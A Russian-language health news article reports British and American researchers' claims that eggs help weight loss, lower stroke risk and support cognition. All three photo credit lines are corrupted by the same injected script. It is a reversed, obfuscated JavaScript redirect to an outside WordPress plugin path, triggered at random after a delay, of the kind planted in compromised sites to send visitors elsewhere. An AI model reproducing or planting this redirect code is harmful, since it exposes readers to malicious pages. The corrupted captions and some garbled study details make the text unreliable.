Есть яйца не вредно, а очень полезно: мнение учёных

Британские и американские специалисты заявили, что употребление яиц способствует снижению веса, предотвращает риск возникновения инсульта, а также помогает при когнитивных расстройствах и стрессах.

Группа шотландских исследователей во главе с диетологом Керри Рекстон выяснила, что яйца очень полезны для здоровья. В них столько витаминов и минералов, что их можно назвать «мультивитаминами природы». Яйца содержат огромное количество питательных веществ, которых нет во многих других продуктах. Например, в одном курином яйце — около 66 калорий и 6,4 г белка, а также много витаминов B, D, E, фосфора и калия.

Есть яйца не вредно, а очень полезно: мнение учёных. Изображение номер 1

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Специалисты заявляют, что большинство исследований, указывавших на вред яиц, являются ошибочными. В частности, это относится к утверждению, что содержание в них холестерина увеличивает риск сердечных заболеваний.

 

Керри Рекстон

диетолог

— Последние годы профессионалы в области здравоохранения как в Великобритании, так и в США настоятельно рекомендуют употреблять яйца, поскольку рекомендации по ограничению потребления яиц из-за содержания холестерина являются ошибочными. Последние научные исследования доказали, что диетический холестерин, который содержится в креветках или яйцах, не оказывает значимого влияния на уровень холестерина в крови и риск сердечных заболеваний. Доказано также, что яйца являются настоящим источником витаминов, минералов, жирных кислот и протеинов, что ставит их в один ряд с большинством современных суперпродуктов.

Доктор Рекстон также заявила, что витамины группы В, содержащиеся в яйцах, поддерживают нормальный уровень энергии в организме, психологические и нервные функции и уменьшают усталость.

Есть яйца не вредно, а очень полезно: мнение учёных. Изображение номер 2

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Учёные выяснили, что употребление яиц напрямую влияет на голод и насыщение, а также на гормоны аппетита. Этот продукт полезен для людей, страдающих диабетом 2-го типа, ожирением, и для тех, кто хочет сбросить вес и нарастить мышечную массу. Дело в том, что в яйцах содержится значительное количество аминокислотного лейцина, который является источником энергии, белка и способствует росту мышц.

 

Американскими учёными было проведено исследование, которое показало, что употребление одного яйца в день снижает риск возникновения инсульта на 12 процентов. Специалисты пришли к такому выводу, проанализировав данные исследований, опубликованных в период с 1982 по 2015 год, в которых приняли участие более 275 тысяч людей. Доктор Доминик Александр считает, что яйца являются источником антиоксидантов, которые, как показало исследование, уменьшают стресс и воспаления. Они также являются источником белка, который был связан с низким кровяным давлением. Кроме этого, было обнаружено, что холестерин, содержащийся в яйцах, не имеет связи с сердечно-сосудистыми заболеваниями. У участников эксперимента, которые регулярно употребляли одно яйцо в день в течение нескольких недель, улучшилось артериальное давление и снизился уровень плохих жиров в крови.

Есть яйца не вредно, а очень полезно: мнение учёных. Изображение номер 3

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Яйца также являются важным источником холина, который используется в лекарственных средствах для лечения когнитивных расстройств у пожилых людей. Исследование, в котором приняли участие 2 497 мужчин среднего возраста, страдающих от слабоумия, показало, что употребление яиц статистически ассоциировалось с лучшими результатами нейропсихологических тестов лобной доли и исполнительной функции.

Статьи по теме

Как обычная соль помогает похудеть: мнение экспертов

Гранатовый сок помогает снизить кровяное давление и улучшить память

Учёные: брокколи и шпинат полезны для памяти

Фрукты полезны при диабете

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector